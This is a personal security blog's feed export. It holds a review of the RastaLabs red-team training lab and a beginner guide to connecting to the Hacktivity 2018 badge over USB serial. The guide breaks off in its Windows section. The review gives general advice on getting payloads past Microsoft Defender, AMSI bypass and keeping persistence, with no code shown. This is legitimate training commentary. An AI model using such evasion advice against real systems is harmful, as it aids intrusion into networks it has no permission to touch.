tag:blogger.com,1999:blog-74296757264818885182024-03-19T05:36:37.780+01:00Jump ESP, jump!Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.comBlogger29125tag:blogger.com,1999:blog-7429675726481888518.post-48740457779885914192023-04-06T10:39:00.000+02:002023-04-06T10:39:15.525+02:00This is the end - and the beginning<p>This post is just to inform everyone that do not expect any new blog posts here, I am moving everything to Jekyll + Github pages. </p><p>You can find the old posts and all the new posts here: </p><p><a href="https://httpscolonforwardslashforwardslashwwwdotzoltanbalazsdotcom.com/">https://httpscolonforwardslashforwardslashwwwdotzoltanbalazsdotcom.com/</a></p><p>So long Google.</p><p><br /></p>Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com0tag:blogger.com,1999:blog-7429675726481888518.post-66125224061805078702020-01-16T15:54:00.001+01:002020-01-16T16:23:43.561+01:00The RastaLabs experience<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: justify;">
Introduction</h2>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It was 20 November, and I was just starting to wonder what I would do during the next month. I had already left my previous job, and the new one would only start in January. Playing with PS4 all month might sound fun for some people, but I knew I would get bored quickly.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Even though I have some limited red teaming experience, I always felt that I wanted to explore the excitement of getting Domain Admin – again. I got my first DA in ˜2010 using pass-the-hash, but that was a loooong time ago, and things change quickly.</div>
<div style="text-align: justify;">
While reading the backlogs of one of the many Slack rooms, I noticed that certain chat rooms were praising RastaLabs. Looking at the lab description, I felt "this is it, this is exactly what I need." How hard could it be, I have a whole month ahead of me, surely I will finish it before Christmas. Boy, was I wrong.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX9HSCADL24xxQ0Kg_NXa_FNm5MZGslgMFRmvyfBxlANXhVCdlXK6n_D3canWgLv8Wl15Y7IPEqVm1EvM51bzSJqI7Sq0JbcCWn8NH3lTwKTwJz0q3Ert19UDt9upZFlVmTz2BCLQlov9C/s1600/giphy.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="365" data-original-width="500" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX9HSCADL24xxQ0Kg_NXa_FNm5MZGslgMFRmvyfBxlANXhVCdlXK6n_D3canWgLv8Wl15Y7IPEqVm1EvM51bzSJqI7Sq0JbcCWn8NH3lTwKTwJz0q3Ert19UDt9upZFlVmTz2BCLQlov9C/s320/giphy.gif" width="320" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The one-time fee of starting the lab is 90 GBP which includes the first month, then every additional month costs 20 GBP. I felt like I was stealing money from Rastamouse and Hackthebox... How can it be so cheap? Sometimes cheap indicates low quality, but not in this case.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaTG24jyy9dWBygfa5YTCiRpT2Mn61k9hk-CHGj2pN2NcPcn7CqzJXyIEZYeWS7C2tvIg_6Zgo59ywTf462kI-0FeZuwGL7JBgvABQtxknImp0U0f1oDmbEe07Bc4iHcD9HsAXu86snDRu/s1600/tenor+%25281%2529.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="368" data-original-width="498" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaTG24jyy9dWBygfa5YTCiRpT2Mn61k9hk-CHGj2pN2NcPcn7CqzJXyIEZYeWS7C2tvIg_6Zgo59ywTf462kI-0FeZuwGL7JBgvABQtxknImp0U0f1oDmbEe07Bc4iHcD9HsAXu86snDRu/s320/tenor+%25281%2529.gif" width="320" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
My experience</h2>
<div>
<br /></div>
<div style="text-align: justify;">
Regarding my previous experience, I already took OSCP, OSCE, SLAE (Securitytube Linux Assembly Expert), and PSP (Powershell for Pentesters), all of which helped me a lot during the lab. I also had some limited red teaming experience. I had more-than-average experience with AV evasion, and I already had experience with the new post-exploit frameworks like Covenant and Powershell Empire. As for writing exploits, I knew how a buffer overflow or a format string attack worked, but I lacked practice in bypassing ASLR and NX. I basically had zero experience with Mimikatz on Windows 10. I used Mimikatz back in 2012, but probably not since. I also had a lot of knowledge on how to do X and Y, on useful tools and hot techniques, but I lacked recent experience with them. Finally, I am usually the last when it comes to speed in hacking, but I have always balanced my lack of speed with perseverance.</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
RastaLabs starts in 3,2,1 ...</h2>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So I paid the initial entry fee, got the VPN connection pack, connected to the lab, and got my first flag after ... 4 days. And there were 17 of them in total. This was the first time I started to worry. I did everything to keep myself on the wrong track, stupid things like assuming incorrect lab network addresses, scanning too few machines, finding the incorrect breadcrumbs via OSINT, trying to exploit a patched web service (as most OSCPers would do), etc. I was also continually struggling with the tools I was using, as I never knew whether they were buggy, or I was misusing them, or this is just not the way to get the flag. I am sure someone with luck and experience could have done this stage in 2-3 hours, but hey, I was there to gain experience.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
During the lab, whenever I got stuck with the same problem for more than 30-40 hours and my frustration was running high, I pinged Rastamouse on the official RastaLabs support channel on <a href="https://mm.netsecfocus.com/">https://mm.netsecfocus.com/</a>. I usually approached him like "Hi, I tried X, Y, and Z but no luck", then he replied "yeah, try Y harder". This kind of information was usually all I needed, and 2-3 hours later I was back on track again. His help was always enough, but never too much to spoil the fun. The availability and professionalism of Rastamouse was 10/10. Huge multi-billion dollar companies fail to provide good enough support, this one guy here was always there to help. Amazing. I highly recommend joining the Mattermost channel – it will help you a lot to see that you are not the only one stuck with problems. But please do not DM him or the channel if you have not already tried harder.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
What's really lovely in the lab is that you can expect real-world scenarios with "RastaLabs employees" working on their computer, reading emails, browsing the web, etc. I believe it is not a spoiler here that at some point in time you have to deliver malware that evades the MS Defender AV on the machine. Yes, there is a real working Defender on the machines, and although it is a bit out of date, it might catch your default payload very quickly. As I previously mentioned, luckily I had recent experience with AV evasion, so this part was not new to me. I highly recommend setting up your own Win10 with the latest Defender updates and testing your payload on it first. If it works there, it will work in the lab. This part can be especially frustrating, because the only feedback you get from the lab is that nothing is happening, and there is no way to debug it. Test your solution locally first.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Powershell Empire turned out to be an excellent solution for me, the only functionality it lacked was Port Forwarding. But you can drop other tools to do this job efficiently.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A little help: even if you manage to deliver your payload and you have a working C&C, it does not mean your task with AV evasion is over. It is highly probable that Defender will block your post-exploit codes. To bypass this, read all the blog posts from Rastamouse about AMSI bypass. This is important.</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Lateral movement</h2>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
When you finally get your first shell back ...</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl-fFdD0JTi6ooTGrdn00x9qX-kl84wztcBvAgRhlL42g2pyxJYPSsY1t7DFKXcw7tp-r1Hlb1seuSqk0XXrxj8-J_NZFWlqpJ7PKY8C5S2Jd59SnUf5U1btD_KKI6ysyg_JKzV2Cy7_3N/s1600/Popped+a+Shell+-+Imgur.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="198" data-original-width="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl-fFdD0JTi6ooTGrdn00x9qX-kl84wztcBvAgRhlL42g2pyxJYPSsY1t7DFKXcw7tp-r1Hlb1seuSqk0XXrxj8-J_NZFWlqpJ7PKY8C5S2Jd59SnUf5U1btD_KKI6ysyg_JKzV2Cy7_3N/s1600/Popped+a+Shell+-+Imgur.gif" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A whole new world starts. From now on, you will spend significant time on password cracking, lateral movement, persistence, and figuring out how Windows AD works.</div>
<div style="text-align: justify;">
In the past, I played a lot of CTF, and from time to time I got the feeling "yeah, even though this challenge was fun, it was not realistic". This never happened during RastaLabs. All the challenges and solutions were 100% realistic, and as the "Ars poetica" of RastaLabs states:</div>
<div style="text-align: justify;">
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO9aAIlD3DALaiJCn8INM2tH5Hpg1YZ4ACSVXnPY8sGDBXwumG-34QJseS7Y6_jje6B5sGbbuRl5RUWwpU0tGpVSjbyyerUPIhCq4DxBkeSIqH3RFuHFjM4J9KgnyQ3l5VlA-LYhgWT_V-/s1600/Screen+Shot+2020-01-16+at+17.21.38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="724" data-original-width="1330" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO9aAIlD3DALaiJCn8INM2tH5Hpg1YZ4ACSVXnPY8sGDBXwumG-34QJseS7Y6_jje6B5sGbbuRl5RUWwpU0tGpVSjbyyerUPIhCq4DxBkeSIqH3RFuHFjM4J9KgnyQ3l5VlA-LYhgWT_V-/s400/Screen+Shot+2020-01-16+at+17.21.38.png" width="400" /></a></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
...which is sooooo true. None of the tasks involve any exploit of any CVE. You need a different mindset for this lab. You need to think about misconfigurations, crackable passwords, privilege abuse, and similar issues. But I believe this lab is still harder to own than 90% of the organizations out there. The only help is that there are no blue-teamers killing our shells.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
About the architecture of the lab: When connecting to the lab with VPN, you basically found yourself in a network you might label as "Internet", with your target network being behind a firewall, just as a proper corporate network should be.</div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAL9ItXQDGv-BeoCSkXHq94vPDDz7hTeKQPPcjbz0RXxlAdh82IYGjIIFcurVhEUNZrhb0f_NQQJa0NNN2cwX5nt_j5WWsgnp1gbZuXMQ4Ct3GagPFUMHvuDwgV9c_4LnFrEApnNjdW6ey/s1600/Screen+Shot+2020-01-12+at+16.16.21.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="777" data-original-width="1600" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAL9ItXQDGv-BeoCSkXHq94vPDDz7hTeKQPPcjbz0RXxlAdh82IYGjIIFcurVhEUNZrhb0f_NQQJa0NNN2cwX5nt_j5WWsgnp1gbZuXMQ4Ct3GagPFUMHvuDwgV9c_4LnFrEApnNjdW6ey/s640/Screen+Shot+2020-01-12+at+16.16.21.png" width="640" /></a></div>
<div style="text-align: justify;">
There are a bunch of workstations – Win10 only, and some servers like fileserver, exchange, DC, SQL server, etc. The majority of servers are Windows Server 2016, and there is one Linux server. The two sites are adequately separated and firewalled.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As time passed, I was getting more and more flags, and I started to feel the power. Then the rollercoaster experience started. I was useless, I knew nothing. Getting the flag, I was god. One hour later, I was useless.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMRXZUUVuY28LdTIRsuhTmA0MB3SMyBTktnApZWpwgTHcNKgSMe7v_NXd3Sl8NVeRxic2l_oPn1xWIrgBODKmaCYUhNIqQdVx4tb9VUMyqeAqyzh_35yVMoNo_pimT_tNCleSHYlq7D-nU/s1600/tenor.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="178" data-original-width="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMRXZUUVuY28LdTIRsuhTmA0MB3SMyBTktnApZWpwgTHcNKgSMe7v_NXd3Sl8NVeRxic2l_oPn1xWIrgBODKmaCYUhNIqQdVx4tb9VUMyqeAqyzh_35yVMoNo_pimT_tNCleSHYlq7D-nU/s1600/tenor.gif" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For example, I spent a significant amount of time trying to get GUI access to the workstations. In the end, I managed to get that, just to find out I did not achieve anything with it. For unknown reasons, none of the frameworks I tried had a working VNC, so I set up my own, and it was pain.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
On December 18, I finally got Domain Admin privileges. So my estimation to "finish the lab" in one month was not that far off. Except that I was far from finishing it, as I still had to find five other flags I was missing. You might ask "you already have DA, how hard could it be to find the remaining five?". Spoiler alert, it was hard. Or to be more precise, not hard, just challenging, and time-consuming. This was also a time when connections on Mattermost RastaLabs channel helped me a lot. Hints like "flag X is on machine Y" helped me keep motivated, yet it did not spoil the fun. Without hints like this, I would not have written this post but would have been stuck with multiple flags.</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
About exploitation</h2>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
And there was the infamous challenge, "ROP the night away." This was totally different from the other 16. I believe this image explains it all:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOYf3hOuqqnYYxQulTX1rTnhSOrNG6mcaq25PsfvgoZWvqa7rcjFsg_OcFEPi4d0qRX1t-6Bs9iEbL1yn8LBNslOaKbYo4AnHiFbmW9cK-9r5D-xrwtSQ9IrGWogyPBqQdPFGrgE9fUjQH/s1600/cc18b3bbe0ceeba8a2992e4826a5300db5170652.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="192" data-original-width="341" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOYf3hOuqqnYYxQulTX1rTnhSOrNG6mcaq25PsfvgoZWvqa7rcjFsg_OcFEPi4d0qRX1t-6Bs9iEbL1yn8LBNslOaKbYo4AnHiFbmW9cK-9r5D-xrwtSQ9IrGWogyPBqQdPFGrgE9fUjQH/s400/cc18b3bbe0ceeba8a2992e4826a5300db5170652.jpg" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you are not friends with GDB, well, you will have a hard time. If you don't have lots of hands-on experience with NX bypass - a.k.a ROP - like me, you will have a hard time with this challenge. The binary exploit challenges during OSCP and OSCE exams are nowhere near as complex as this one. If you have OSEE, you will be fine. For this challenge, I used GDB-Peda and Python pwntools – check them out in case you are not familiar with them. For me, solving this challenge took about 40 hours. Experienced CTF people could probably solve it in 4 hours or less.</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Conclusion</h2>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I would not recommend taking this lab for total beginners *. I also do not recommend doing the lab if you only have limited time per day, which is especially true if you are working on your home computer. I probably would have saved hours or even days if I had set up a dedicated server in the cloud for this lab. The issue was that the lab workstations were rebooted every day, which meant that I always lost my shells. "Persistence FTW", you might say, but if your C&C is down when the workstation reboots, you are screwed. "Scheduled tasks FTW", you might say, but unless you have a strict schedule on when you start your computer, you will end up with a bunch of scheduled tasks just to get back the shell whenever you start your computer. Day after day I spent the first hour getting back to where I had been the day before. And I just figured out at the end of the lab why some of my scheduled tasks were not working ...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I would be really interested to see how much time I spent connected to the lab. Probably it was around 200–250 hours in total, which I believe is more than I spent on OSCP and OSCE combined. But it was totally worth it. I really feel the power now that I learned so many useful things.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But if you consider that the price of the one-month lab is 20 GBP, it is still a very cheap option to practice your skills. </div>
<div style="text-align: justify;">
* It is totally OK to do the lab in 6 months, in case you start as a beginner. That is still just 190 GBP for the months of lab access, and you will gain a lot of experience during this time. You will probably have a hard time reaching the point when you have a working shell, but it is OK. You can find every information on Google, you just need time, patience and willingness to get there.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Anyway, it is still an option not to aim to "get all the flags". Even just by getting the first two flags, you will gain significant experience in "getting a foothold". But for me, not getting all the flags was never an option.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjybjXNNmyVPU6SfypHf4DdstNkIIL-enxBiVNNZwDHMksY8bR7UtTBeVr3_vcJu6kEDOhObeQTZUV6KSM85q9_wDe_ZHN_OXwkwVjY-uopUfCaBR7GAcutBaaZ7ChLP3ZWVpUG6vet4taE/s1600/cover8.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="900" data-original-width="1600" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjybjXNNmyVPU6SfypHf4DdstNkIIL-enxBiVNNZwDHMksY8bR7UtTBeVr3_vcJu6kEDOhObeQTZUV6KSM85q9_wDe_ZHN_OXwkwVjY-uopUfCaBR7GAcutBaaZ7ChLP3ZWVpUG6vet4taE/s400/cover8.jpg" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you are still unconvinced, check these other blog posts:</div>
<div style="text-align: justify;">
<a href="https://jmpesp.me/a-rastalabs-story/">https://jmpesp.me/a-rastalabs-story/</a></div>
<div style="text-align: justify;">
<a href="https://www.gerrenmurphy.com/rastalabs-review/">https://www.gerrenmurphy.com/rastalabs-review/</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Or see what others wrote about RastaLabs.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3Y7zEKOs1rO1W6pj0g-2A5WUMllNs73qcHdAIsQT8ThOFMFToJAu7Iyr0qF0q1GWtz7lCojkuW5_lEOgPIG-1V6aTzb17MNmPknOmkU9gamuY2apIA_B3lL9QnyO4J7KfiaJsfQwmuqa2/s1600/Screen+Shot+2020-01-12+at+17.21.11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="911" data-original-width="1600" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3Y7zEKOs1rO1W6pj0g-2A5WUMllNs73qcHdAIsQT8ThOFMFToJAu7Iyr0qF0q1GWtz7lCojkuW5_lEOgPIG-1V6aTzb17MNmPknOmkU9gamuY2apIA_B3lL9QnyO4J7KfiaJsfQwmuqa2/s640/Screen+Shot+2020-01-12+at+17.21.11.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Footnote</h2>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In case you start the lab, please, pretty please, follow the rules, and do not spoil the fun for others. Do not leave your tools around, do not keep shared drives open, do not leave FLAGs around. Leave the machine as it was. If you have to upload a file, put it in a folder others won't easily find. This is a necessary mindset when it comes to real-world red teaming. Don't forget to drop a party parrot into the chat whenever you or someone else gets a new flag. And don't forget:</div>
<blockquote class="tr_bq" style="text-align: justify;">
OSCP has no power here. Cry harder!</blockquote>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I will probably keep my subscription to the lab and try new things, new post-exploit frameworks. I would like to thank @_rastamouse for this great experience, @superkojiman for the ROP challenge. Hackthebox for hosting the lab with excellent uptime.</div>
<div style="text-align: justify;">
As for @gentilkiwi and @harmj0y, these two guys probably advanced red-teaming more than everyone else combined together. pwntools from @gallopsled was also really helpful. And I will be forever grateful to Bradley from finance for his continuous support whenever I lost my shells.</div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com0tag:blogger.com,1999:blog-7429675726481888518.post-4902898721825616942019-09-19T10:56:00.001+02:002019-10-08T17:57:50.458+02:00Hacktivity 2018 badge - quick start guide for beginners<div class="separator" style="clear: both; text-align: justify;">
You either landed on this blog post because </div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<ul>
<li>you are a huge fan of Hacktivity</li>
<li>you bought this badge around a year ago</li>
<li>you are just interested in hacker conference badge hacking. </li>
</ul>
<div class="separator" style="clear: both; text-align: justify;">
or maybe all of the above. Whatever the reasons, this guide should be helpful for those who never had any real-life experience with these little gadgets. </div>
<div class="separator" style="clear: both; text-align: justify;">
But first things first, here is a list what you need for hacking the badge:</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<ul>
<li>a computer with USB port and macOS, Linux or Windows. You can use other OS as well, but this guide covers these</li>
<li>USB mini cable to connect the badge to the computer</li>
<li>the Hacktivity badge from 2018</li>
</ul>
<div>
By default, this is how your badge looks like.</div>
<br />
<div style="text-align: center;">
<img border="0" data-original-height="1600" data-original-width="1200" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpol7c4FwjDEp31isJBwAqDG3IroHXFJDvmjhb01t9VdClB_ZKVxUds57uHFJNzx7BDIMH-myTcQ55TEZN6jc7it0OgFg-bCLCeNqMSw4CD_ub11l_41U46Ne0Uh2ISbFLUS0qAxBTxQBB/s400/IMG_8640.JPG" width="300" /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2 style="clear: both; text-align: justify;">
Let's get started</h2>
<div class="separator" style="clear: both; text-align: justify;">
Luckily, you don't need any soldering skills for the first steps. Just connect the USB mini port to the bottom left connector on the badge, connect the other part of the USB cable to your computer, and within some seconds you will be able to see that the lights on your badge are blinking. So far so good. </div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Now, depending on which OS you use, you should choose your destiny here.</div>
<h3 style="text-align: justify;">
Linux</h3>
<div style="text-align: justify;">
The best source of information about a new device being connected is</div>
<div style="text-align: justify;">
# dmesg</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The tail of the output should look like</div>
<pre style="text-align: justify;">[267300.206966] usb 2-2.2: new full-speed USB device number 14 using uhci_hcd
[267300.326484] usb 2-2.2: New USB device found, idVendor=0403, idProduct=6001
[267300.326486] usb 2-2.2: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[267300.326487] usb 2-2.2: Product: FT232R USB UART
[267300.326488] usb 2-2.2: Manufacturer: FTDI
[267300.326489] usb 2-2.2: SerialNumber: <b>AC01U4XN</b>
[267300.558684] usbcore: registered new interface driver usbserial_generic
[267300.558692] usbserial: USB Serial support registered for generic
[267300.639673] usbcore: registered new interface driver ftdi_sio
[267300.639684] usbserial: USB Serial support registered for FTDI USB Serial Device
[267300.639713] ftdi_sio 2-2.2:1.0: FTDI USB Serial Device converter detected
[267300.639741] usb 2-2.2: Detected FT232RL
[267300.643235] usb 2-2.2: FTDI USB Serial Device converter now attached to <b>ttyUSB0</b>
</pre>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Dmesg is pretty kind to us, as it even notifies us that the device is now attached to ttyUSB0. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
From now on, connecting to the device is exactly the same as it is in the macOS section, so please find the "Linux users, read it from here" section below. </div>
<h3 style="clear: both; text-align: justify;">
macOS</h3>
<div class="separator" style="clear: both; text-align: justify;">
There are multiple commands you can type into Terminal to get an idea about what you are looking at. One command is:</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div>
<pre># ioreg -p IOUSB -w0 -l</pre>
</div>
<div>
<br /></div>
<div>
With this command, you should get output similar to this:</div>
<div>
<br />
<pre>+-o FT232R USB UART@14100000 <class AppleUSBDevice, id 0x100005465, registered, matched, active, busy 0 (712 ms), retain 20>
| {
| "sessionID" = 71217335583342
| "iManufacturer" = 1
| "bNumConfigurations" = 1
| "idProduct" = 24577
| "bcdDevice" = 1536
| "Bus Power Available" = 250
| "USB Address" = 2
| "bMaxPacketSize0" = 8
| "iProduct" = 2
| "iSerialNumber" = 3
| "bDeviceClass" = 0
| "Built-In" = No
| "locationID" = 336592896
| "bDeviceSubClass" = 0
| "bcdUSB" = 512
| "USB Product Name" = "FT232R USB UART"
| "PortNum" = 1
| "non-removable" = "no"
| "IOCFPlugInTypes" = {"9dc7b780-9ec0-11d4-a54f-000a27052861"="IOUSBFamily.kext/Contents/PlugIns/IOUSBLib.bundle"}
| "bDeviceProtocol" = 0
| "IOUserClientClass" = "IOUSBDeviceUserClientV2"
| "IOPowerManagement" = {"DevicePowerState"=0,"CurrentPowerState"=3,"CapabilityFlags"=65536,"MaxPowerState"=4,"DriverPowerState"=3}
| "kUSBCurrentConfiguration" = 1
| "Device Speed" = 1
| "USB Vendor Name" = "FTDI"
| "idVendor" = 1027
| "IOGeneralInterest" = "IOCommand is not serializable"
| "USB Serial Number" = "<b>AC01U4XN</b>"
| "IOClassNameOverride" = "IOUSBDevice"
| }
</pre>
</div>
<div style="text-align: justify;">
The most important information you get is the USB serial number - AC01U4XN in my case.<br />
Another way to get this information is<br />
<pre># system_profiler SPUSBDataType
</pre>
which will give back something similar to:<br />
<pre>FT232R USB UART:
Product ID: 0x6001
Vendor ID: 0x0403 (Future Technology Devices International Limited)
Version: 6.00
Serial Number: <b>AC01U4XN</b>
Speed: Up to 12 Mb/sec
Manufacturer: FTDI
Location ID: 0x14100000 / 2
Current Available (mA): 500
Current Required (mA): 90
Extra Operating Current (mA): 0
</pre>
<div>
<br /></div>
<div>
The serial number you got is the same.<br />
<br />
What you are trying to achieve here is to connect to the device, but in order to connect to it, you have to know where the device in the /dev folder is mapped to. A quick and dirty solution is to list all devices under /dev when the device is disconnected, once when it is connected, and diff the outputs. For example, the following should do the job:<br />
<br />
<pre>ls -lha /dev/tty* > plugged.txt
ls -lha /dev/tty* > np.txt
vimdiff plugged.txt np.txt
</pre>
<br />
The result should be obvious, /dev/tty.usbserial-AC01U4XN is the new device in case macOS. In the case of Linux, it was /dev/ttyUSB0.<br />
<h4>
Linux users, read it from here. macOS users, please continue reading</h4>
Now you can use either the built-in screen command or minicom to get data out from the badge. Usually, you need three information in order to communicate with a badge. Path on /dev (you already got that), speed in baud, and the async config parameters. Either you can guess the speed or you can Google that for the specific device. Standard baud rates include 110, 300, 600, 1200, 2400, 4800, 9600, 14400, 19200, 38400, 57600, 115200, 128000 and 256000 bits per second. I usually found 1200, 9600 and 115200 a common choice, but that is just me.<br />
Regarding the async config parameters, the default is that <b>8</b> bits are used, there is <b>n</b>o parity bit, and <b>1</b> stop bit is used. The short abbreviation for this is 8n1. In the next example, you will use the screen command. By default, it uses 8n1, but it is called cs8 to confuse the beginners.<br />
<br />
If you type:<br />
# screen /dev/tty.usbserial-AC01U4XN 9600<br />
or<br />
# screen /dev/ttyUSB0 9600<br />
and wait for minutes and nothing happens, it is because the badge already tried to communicate via the USB port, but no-one was listening there. Disconnect the badge from the computer, connect again, and type the screen command above to connect. If you are quick enough you can see that the amber LED will stop blinking and your screen command is greeted with some interesting information. By quick enough I mean ˜90 seconds, as it takes the device 1.5 minutes to boot the OS and the CTF app.<br />
<h3>
Windows</h3>
<div>
When you connect the device to Windows, you will be greeted with a pop-up.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGYApDq3aAIybjNgLo6RAjmyCPpGKdbl9VOEV0p3uhxxc5R2db2vK8lXbmNXeZGLZl4-2Qu8M48QZ9h2FH_SUOyRHzRXPI2SB3pfi0z7tBn1adG_5KyYqcE_xfc37XQixQMySAZG9n3DT8/s1600/Screen+Shot+2019-09-16+at+17.52.32.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="124" data-original-width="488" height="101" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGYApDq3aAIybjNgLo6RAjmyCPpGKdbl9VOEV0p3uhxxc5R2db2vK8lXbmNXeZGLZl4-2Qu8M48QZ9h2FH_SUOyRHzRXPI2SB3pfi0z7tBn1adG_5KyYqcE_xfc37XQixQMySAZG9n3DT8/s400/Screen+Shot+2019-09-16+at+17.52.32.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Just click on the popup and you will see the COM port number the device is connected to:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggmq_h_QZ4ZBlLabUde8Masf_omDtBZOstuW1gyqc74l-MwIw2jSaPlvdB7WMJteLb_vORNajtZWez0U4PToDOMH1NS_48YgZFH0UwB6m285VJ1pGjLvpc4QVctL8iva3izEM4zQDWHEQp/s1600/Screen+Shot+2019-09-16+at+17.52.55.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="269" data-original-width="663" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggmq_h_QZ4ZBlLabUde8Masf_omDtBZOstuW1gyqc74l-MwIw2jSaPlvdB7WMJteLb_vORNajtZWez0U4PToDOMH1NS_48YgZFH0UwB6m285VJ1pGjLvpc4QVctL8iva3izEM4zQDWHEQp/s400/Screen+Shot+2019-09-16+at+17.52.55.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
